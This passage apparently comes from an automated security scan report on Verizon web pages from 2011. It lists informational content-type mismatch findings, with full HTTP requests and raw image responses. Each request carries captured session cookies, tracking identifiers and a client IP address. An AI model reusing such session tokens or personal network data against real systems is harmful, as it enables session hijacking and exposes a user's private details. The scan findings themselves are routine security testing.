Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V

Response

HTTP/1.0 200 OK
Content-Length: 1053
Content-Type: image/gif
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/buttons/btn_ok.gif
Last-Modified: Thu, 01 Sep 2011 17:51:54 GMT
Accept-Ranges: bytes
ETag: "099b7d5cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:09 GMT
Connection: keep-alive

.PNG
.
...IHDR...;.................PLTE......................fg.ww......................DE.......DD.......UU.Z[.......ww.......ac..........ww.....................................................
...[SNIP]...

26.67. https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V

Response

HTTP/1.0 200 OK
Content-Length: 110
Content-Type: image/gif
Content-Location: http://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/Common/images/OrderNew/headers/bk.gif
Last-Modified: Thu, 01 Sep 2011 17:51:56 GMT
Accept-Ranges: bytes
ETag: "0c6e8d6cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:08 GMT
Connection: keep-alive

.PNG
.
...IHDR..............Fq.... vpAg............
... IDAT..c......E..................*.."]..M....IEND.B`.

26.68. https://www22.verizon.com/ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V

Response

HTTP/1.0 200 OK
Content-Length: 114
Content-Type: image/gif
Content-Location: http://www22.verizon.com/ForYourSmallBiz/GoFlow/Common/Images/OrderNew/buttons/gray.gif
Last-Modified: Thu, 01 Sep 2011 17:51:54 GMT
Accept-Ranges: bytes
ETag: "099b7d5cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:07 GMT
Connection: keep-alive

.PNG
.
...IHDR.......5............9IDAT....... .....GE....p...jM.,......S.$...Z....F.x........2./N.....IEND.B`.

26.69. https://www22.verizon.com/content/verizonglobalhome/gPromo.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/content/verizonglobalhome/gPromo.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /content/verizonglobalhome/gPromo.aspx?getVal=1 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/?lid=//global//residential
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; CP=null*; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21
Expires: Mon, 05 Sep 2011 22:19:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:19:51 GMT
Connection: keep-alive

,Y,FL;NY;PA,Y,807,,

26.70. https://www22.verizon.com/foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; refURL=https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX?CLIENT=RGA&CUSTTYPE=NEW&SMBBANNERID=ND~LECLS+3YR+1V; CP=null*

Response

HTTP/1.0 200 OK
Content-Length: 722
Content-Type: image/gif
